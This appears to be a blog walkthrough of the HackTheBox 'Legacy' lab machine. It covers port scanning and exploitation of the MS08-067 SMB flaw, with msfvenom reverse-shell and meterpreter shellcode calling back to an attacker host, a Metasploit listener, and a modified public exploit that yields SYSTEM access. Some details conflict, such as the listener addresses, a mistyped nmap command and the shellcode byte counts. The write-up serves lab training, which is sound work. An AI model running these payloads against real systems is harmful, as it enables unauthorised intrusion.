Legacy Hackthebox

Posted on

Disassembly of Julio Ureña’s youtube video HackTheBox - Legacy. Windows box includes enumeration of system to an exploitable SMB server. Modifying a public exploit and inserting custom shellcode with msfvenom both meterpreter and shell_reverse_tcp.

Legal Usage: The information provided by execute@will is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. Information provided by this website is to be regarded from an “ethical hacker” standpoint. Only preform testing on systems you OWN and/or have expressed written permission. Use information at your own risk.

By continued reading, you acknowledge the aforementioned user risks/responsibilities.

This series of write-up will contain comprehensive write-ups of hackthebox machines. In an effort to sharpen reporting techniques and help solidify the understand and methodologies used during penetration testing.

Enumeration

Quick Masscan Script:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
#!/bin/bash

#syntax ./masscan [targetip]
echo "Starting TCP Masscan"
masscan -p1-65535 --rate 500 -e tun0 $1 > masscan-tcp.all
echo

echo "**** Display Results ****"
echo "****       TCP       ****"
cat masscan-tcp.all | grep tcp | cut -d '/' -f 1 | cut -d' ' -f 4
echo

echo "Starting UDP Masscan"
masscan -pU:1-65535 --rate 500 -e tun0 $1 > masscan-udp.all
echo

echo "**** UDP ****"
cat masscan-udp.all | grep udp | cut -d '/' -f 1 | cut -d' ' -f 4
echo

nmap -sC -sV -oA nmap/legacy 10.10.10.4

(results)

we know we are dealing with a windows xp box and will next run the smb nmap script

1
nmap --script*smb-vuln* -p139,455 - nmap-smb-vuln.txt 10.10.10.4

discovered vulnerable SMB services.

ms08-067 exploit

based off the exploit database: https://www.exploit-db.com/exploits/40279

exploit in a nutshell:

1
We are taking over assembly of SHELL32.DLL and NTDLL.DLL which are vulnerable to an overflow which we then inject our own shellcode generated with msfvenom to create a connection to the target.

creating msfvenom (meterpreter) shellcode

1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.15.248 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f python -v shellcode

-v = change the variable of the output

at this point our instructions stated we need to have a file size of 380bytes and the current payload is 380 bytes.

creating msfvenom (shell_reverse_tcp) shellcode

1
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.15.248 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f python -v shellcode

created with 348 bytes to which we will need to fill the rest of the space (32 bytes) with nops *\x90*.

adding the nops via msfvenom:

1
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.15.248 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f python -v shellcode -n 32

32 bytes of nops have been added to the final shellcode.

setup metasploit listener

1
2
msfdb run #launches postgress as well
msfconsole #normal launch


1
2
3
use multi/handler
set payload windows/meterpreter/reverse_tcp
options


1
2
3
set LHOST 10.10.10.248
set LPORT 443
run

Download exploit locally

1
wget http://www.exploit-db.com/download/40279.py -O MS8-067.py

edit MS8-067.py the shell code section:

calculate bytes of shellcode with python

open python:

1
python

enter variable shellcode:

1
2
3
shellcode = ""
(paste shell code)
len(shellcode)

without the nops we have value of 380 bytes

paste generated shellcode into exploit

add the shellcode generated into the exploit and remove x1 nop of \x90 as we had 381 bytes of shellcode in our original msfvenom.

quick test of length with python:

410 bytes was the exact number of bytes in the original shellcode.

enumerating OS type with nmap

1
nmap -O 10.10.10.14

we already enumerated that the system is windows xp but to verify that before launching our exploit perform this verification. This is needed because if we send the wrong set of exploit data to the target we could crash it.

Exploiting

We are going to use using the option “7” for “Windows XP SP3 English (AlwaysON NX)” based off the exploit.

testing functionality

Run the script to see if we have functionality:

1
python MS08-067.py

we have functionality.

send exploit

1
python MS08-067.py 10.10.10.4 7

listener return

Root&Loot

send meterpreter getuid

NT AUTHORITY/SYSTEM!

If you want to accomplish the task of learning Spanish and Pentesting I recommending checking out Julio at his YouTube page. Link: https://www.youtube.com/channel/UC2o1vzpUIvgf0VMJIMKZ_rQ